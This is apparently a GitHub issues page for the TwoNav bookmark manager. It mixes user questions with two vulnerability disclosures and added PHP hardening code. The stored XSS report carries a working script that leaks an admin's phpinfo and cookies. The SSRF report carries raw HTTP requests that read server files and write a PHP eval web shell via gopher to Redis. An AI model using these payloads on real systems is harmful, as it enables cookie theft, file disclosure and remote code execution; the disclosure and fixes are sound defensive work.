tznb1 / twonav
TwoNav second-generation cloud navigation | cloud bookmark management system
Home Page: https://two.lm21.top
License: GNU General Public License v3.0
Because I need to build an English-language site, I would like to ask whether the admin panel has an option to switch the interface to English.
I looked through the admin panel and did not find any option for switching to an English interface.
Vulnerability Product: TwoNav v2.0.28-20230624
Vulnerability version: v2.0.28-20230624
Vulnerability type: Stored XSS
Vulnerability Details:
Vulnerability location: add header, "/index.php?c=api&method=read_data&type=phpinfo&u=admin"
The default settings allow free registration, which causes stored XSS.
The stored XSS payload can make the admin call phpinfo(), bypassing HttpOnly and causing disclosure of cookies, the website's root path, PHP variables and so on.
Firstly, register an account at http://localhost/?c=login:
account: test
password: test
Then go to "站点设置" (Site Settings).
Because of HttpOnly, you need to make the admin call phpinfo(); the API is: http://localhost/index.php?c=api&method=read_data&type=phpinfo&u=admin
Enter the payload in the input "头部(header)代码 - 用户" (header code - user):
Payload:
```html
<script src="http://cdn.bootcss.com/jquery/1.11.0/jquery.min.js" type="text/javascript"></script>
<script>
$.ajax({
    url: '/index.php?c=api&method=read_data&type=phpinfo&u=admin',
    type: 'get',
    success: function (data) {
        console.log(data);
    }
})
</script>
```
After that, when an admin opens the page "http://localhost/?u=test", the page will automatically fetch phpinfo and print it with console.log().
(Certainly you can modify the payload to send the phpinfo to your server; console.log is just a test.)
Finally, we download the phpinfo and open it as HTML.
A large number of cookies are disclosed here, as well as the website's root path.
Stored XSS proved.
Discovered by leeya_bug
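The condition the report above depends on is that a script stored by one account is rendered into a page that another account, here root, opens with its own session cookies. The following is an added defensive example, not TwoNav project code; the account array keys, the `allow_user_header_code` config key and the function names are assumptions. It shows a rendering policy under which stored header code is only emitted for its owner or for anonymous visitors, and is switched off for non-root authors unless the site owner explicitly enables it.

```php
<?php
// Added defensive example; it is not TwoNav project code. It shows one way to
// stop a stored "header code" block from executing in another account's
// browser session, which is what the report above relies on: the admin opens
// /?u=test and the stored script runs with the admin's cookies.
// All names below (uid/group keys, allow_user_header_code) are assumptions.

declare(strict_types=1);

/**
 * May $author store custom header code at all? Assumed policy: only the root
 * account, unless the site owner has explicitly switched the feature on for
 * ordinary users. Free registration plus header code for everyone is the
 * combination the report abuses, so the default here is off.
 */
function header_code_permitted(array $author, array $config): bool
{
    return $author['group'] === 'root'
        || ($config['allow_user_header_code'] ?? false) === true;
}

/**
 * May the header code stored by $owner be emitted into the page currently
 * rendered for $viewer (null = not logged in)?
 *  - the owner always gets their own code;
 *  - an anonymous visitor gets it, so public navigation pages keep working
 *    and there is no session the script could ride on;
 *  - any other logged-in account, especially root, does not: the script
 *    would otherwise run with that account's cookies and could call
 *    privileged same-origin endpoints such as the phpinfo API.
 */
function may_render_user_header(array $owner, ?array $viewer): bool
{
    if ($viewer === null) {
        return true;
    }
    return $viewer['uid'] === $owner['uid'];
}

/** Returns what to inject into <head>: the code, or an HTML comment instead. */
function render_user_header(string $code, array $owner, ?array $viewer, array $config): string
{
    if (!header_code_permitted($owner, $config)) {
        return '<!-- header code disabled for this account group -->';
    }
    if (!may_render_user_header($owner, $viewer)) {
        return '<!-- header code not rendered for another account -->';
    }
    return $code;
}

// Constructed demo data modelled on the accounts in the report.
$admin  = ['uid' => 1, 'group' => 'root'];
$test   = ['uid' => 2, 'group' => 'user'];
$config = ['allow_user_header_code' => true];   // feature enabled, as in the report
$stored = '<script>/* stored by user "test" */</script>';

foreach ([['viewer' => null,   'who' => 'anonymous visitor'],
          ['viewer' => $test,  'who' => 'owner "test"'],
          ['viewer' => $admin, 'who' => 'root "admin"']] as $case) {
    printf("%-18s -> %s\n", $case['who'],
        render_user_header($stored, $test, $case['viewer'], $config));
}
// With the feature switched off (the assumed default) nothing is rendered for
// non-root authors regardless of who is viewing:
echo render_user_header($stored, $test, null, []), "\n";
```

Run with `php render_policy.php`: the first two cases print the stored script, the root viewer gets the placeholder comment, and the final call prints the "disabled" comment. Anonymous visitors still execute whatever the owner stored, so the feature remains a risk for them; that is why the assumed default keeps it restricted to the root account rather than relying on the viewer check alone.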
As the title says: ARM devices consume much less power than x86 devices, so they are better suited to running this kind of navigation program long-term.
ARM device: 50 yuan each, 5W/h
x86 device: from 200, 50W/h
Is the webstack-hugo theme only usable after obtaining authorization?
Tencent Cloud server with MySQL 5.7: the web page opens, but the installation fails with the message “保存配置失败” (failed to save configuration).
Vulnerability Product: TwoNav v2.1.13-20240321
Vulnerability version: v2.1.13-20240321
Vulnerability type: SSRF
Vulnerability location: system\api.php
While using TwoNav, I discovered an SSRF vulnerability in '站长工具' (Webmaster Tools) -> '连通测试' (Connectivity Test).
I can use this vulnerability to detect internal network information or more.
Given the following snippet:
```php
function read_data(){
    global $USER_DB;
    // The listed types are restricted to the root account only!
    if($USER_DB['UserGroup'] != 'root' && in_array( $_GET['type'],['diagnostic_log','connectivity_test','phpinfo'])){
        msg(-1,'无权限');
    }
    // Summary statistics
    if($_GET['type'] == 'home'){
        $category_count = count_db('user_categorys',['uid'=>UID])??0;
        $link_count = count_db('user_links',['uid'=>UID])??0;
        $index_count = get_db('user_count','v',['uid'=>UID,'k'=>date('Ym'),'t'=>'index_Ym'])??0;
        $click_count = get_db('user_count','v',['uid'=>UID,'k'=>date('Ym'),'t'=>'click_Ym'])??0;
        msgA( ['code'=>1,'data'=>[$category_count,$link_count,$index_count,$click_count] ]);
    // Connectivity test
    }elseif($_GET['type'] == 'connectivity_test'){
        if($GLOBALS['global_config']['offline'] == '1'){
            msg(1,'您已开启离线模式,无法使用该功能!');
        }
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $_POST['url']);   // user-controlled target, no validation
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $start = microtime(true);
        $response = curl_exec($ch);
        $end = microtime(true);
        $time = round(($end - $start) * 1000, 2);
        if(curl_errno($ch)) {
            $log .= "请求发生错误:".curl_error($ch);
        } else {
            $log .= "响应内容:".$response ?? 'Null' ;   // full response body is returned to the caller
            $log .= ",访问耗时:{$time} 毫秒。" ;
        }
        curl_close($ch);
        msg(1,$log);
    }
    // ... remaining type branches are not included in the report
}
```
Firstly, log in to the backend as an administrator.
Visit http://localhost/index.php?c=admin&u=admin#root/tool.
Click on '站长工具' (Webmaster Tools) -> '连通测试' (Connectivity Test), use Burp Suite to capture the request, and modify the request data.
Through testing, I have discovered various exploits, including but not limited to:
Read any file through the file protocol:
```http
POST /TwoNav/index.php?c=api&method=read_data&type=connectivity_test&u=admin HTTP/1.1
Host: 192.168.31.184
Content-Length: 19
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.184
Referer: http://192.168.31.184/TwoNav/?c=admin&page=root/tool&u=admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: TwoNavSID=mjehh1692q6k2m13345op8ljr5; admin_key=2da422eacc04d523b4732337fc682a70
Connection: close

url=file:///D:/flag
```
Detect ports through the dict protocol.
Write a shell through the gopher protocol (if the server has Redis installed):
```http
POST /TwoNav/index.php?c=api&method=read_data&type=connectivity_test&u=admin HTTP/1.1
Host: 192.168.31.184
Content-Length: 662
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.184
Referer: http://192.168.31.184/TwoNav/?c=admin&page=root/tool&u=admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: db_type=mysql; TwoNav_initial=83r8q51c605fflp84i1ibsb6qi; admin_key=66495a9c3f40439d250286a81f4aa1dc; TwoNavSID=o8ckle5vgsfhuu4l2gq0so8e11
Connection: close

url=gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252433%250D%250A%250A%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527xxx%2527%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252427%250D%250AD%253A%255Cenv%255Cphp%255Cphpstudy_pro%255CWWW%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A=
```
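The `connectivity_test` branch quoted in the report hands `$_POST['url']` straight to curl, so every scheme libcurl supports (file, dict, gopher, ...) and every address the server can reach, loopback included, is available to the caller, and the response body is echoed back. The following is an added hardening example, not TwoNav project code: a target check that admits only http/https to public addresses on standard ports, followed by a curl call that pins the transfer to the vetted IP. The function names, the injected `$resolver` and the sample URLs are assumptions for illustration.

```php
<?php
// Added hardening example; it is not TwoNav project code. It puts a target
// check in front of the curl call quoted in the report above and pins the
// transfer to the vetted address. Function names, the $resolver parameter
// and the sample URLs are assumptions for illustration.

declare(strict_types=1);

/** True when $ip is loopback, link-local, private or otherwise not public. */
function is_internal_ip(string $ip): bool
{
    // NO_PRIV_RANGE: 10/8, 172.16/12, 192.168/16, fc00::/7
    // NO_RES_RANGE:  0/8, 127/8, 169.254/16, 240/4, ::1, ::, fe80::/10, ...
    // Anything that is not a valid IP at all is treated as internal too.
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false;
}

/**
 * Validate a user-supplied connectivity-test target.
 * Returns [true, $ip] if it may be fetched, else [false, $reason].
 * $resolver(string $host): ?string is injected so the check runs offline;
 * in production something like
 *   fn($h) => ($ip = gethostbyname($h)) !== $h ? $ip : null
 * (IPv4 only; use dns_get_record() to cover AAAA records as well).
 */
function check_test_target(string $url, callable $resolver): array
{
    $p = parse_url($url);
    if ($p === false || empty($p['scheme'])) {
        return [false, 'malformed URL'];
    }
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return [false, "scheme '{$scheme}' not allowed"];      // file:, dict:, gopher: ...
    }
    if (empty($p['host'])) {
        return [false, 'missing host'];
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return [false, 'credentials in URL not allowed'];
    }
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) {
        return [false, "port {$port} not allowed"];             // no port probing
    }
    $host = trim($p['host'], '[]');                            // IPv6 literal brackets
    $ip = filter_var($host, FILTER_VALIDATE_IP) !== false ? $host : $resolver($host);
    if ($ip === null || is_internal_ip($ip)) {
        return [false, "host '{$host}' is not a public address"];
    }
    return [true, $ip];
}

/** The report's curl call, reworked to use only the vetted address. */
function hardened_connectivity_test(string $url, string $ip): array
{
    $p    = parse_url($url);
    $port = $p['port'] ?? (strtolower($p['scheme']) === 'https' ? 443 : 80);
    $ch   = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL             => $url,
        CURLOPT_TIMEOUT         => 10,
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_SSL_VERIFYPEER  => true,                       // the report's code had false
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,                      // a redirect could point inward
        // Pin host:port to the checked IP so a second lookup inside curl
        // cannot be answered with an internal address (DNS rebinding).
        CURLOPT_RESOLVE         => ["{$p['host']}:{$port}:{$ip}"],
    ]);
    $start = microtime(true);
    curl_exec($ch);
    $ms   = round((microtime(true) - $start) * 1000, 2);
    $err  = curl_errno($ch) ? curl_error($ch) : null;
    $code = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    // Return reachability and timing only. Echoing the body back to the
    // caller, as the original does, turns a reachability check into a
    // read primitive for whatever the server can reach.
    return ['reachable' => $err === null, 'http_code' => $code, 'ms' => $ms, 'error' => $err];
}

// Constructed demo: a fake resolver and the kinds of input seen in the report.
// 203.0.113.10 is a documentation-range placeholder, not a real host.
$resolver = fn(string $h): ?string =>
    ['example.org' => '203.0.113.10', 'intranet.local' => '10.0.0.5'][$h] ?? null;
$samples = [
    'file:///D:/flag',
    'dict://127.0.0.1:6379/info',
    'gopher://127.0.0.1:6379/_%2A1%0D%0A',
    'http://169.254.169.254/latest/meta-data/',
    'http://[::1]/',
    'http://intranet.local/',
    'http://example.org:8080/',
    'https://example.org/',
];
foreach ($samples as $u) {
    [$ok, $why] = check_test_target($u, $resolver);
    printf("%-44s %s\n", $u, $ok ? "allowed, connect to {$why}" : "blocked: {$why}");
}
// Only a target that passed the check would ever reach the network:
// $result = hardened_connectivity_test('https://example.org/', '203.0.113.10');
```

Run with `php ssrf_check.php`: the first seven samples are rejected (scheme, reserved or private address, or non-standard port) and only `https://example.org/` is allowed. Two design points matter in practice: the resolved address is checked, not the hostname, so a name that resolves to 127.0.0.1 or a decimal form such as `2130706433` is caught once the resolver returns it in dotted form; and the check and the connection use the same IP via `CURLOPT_RESOLVE`, so a record that changes between lookup and fetch cannot redirect the request inward. Restricting ports to 80 and 443 is a deliberate trade-off that removes the port-probing use of the endpoint; relax it only with an explicit allowlist.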
As in the title.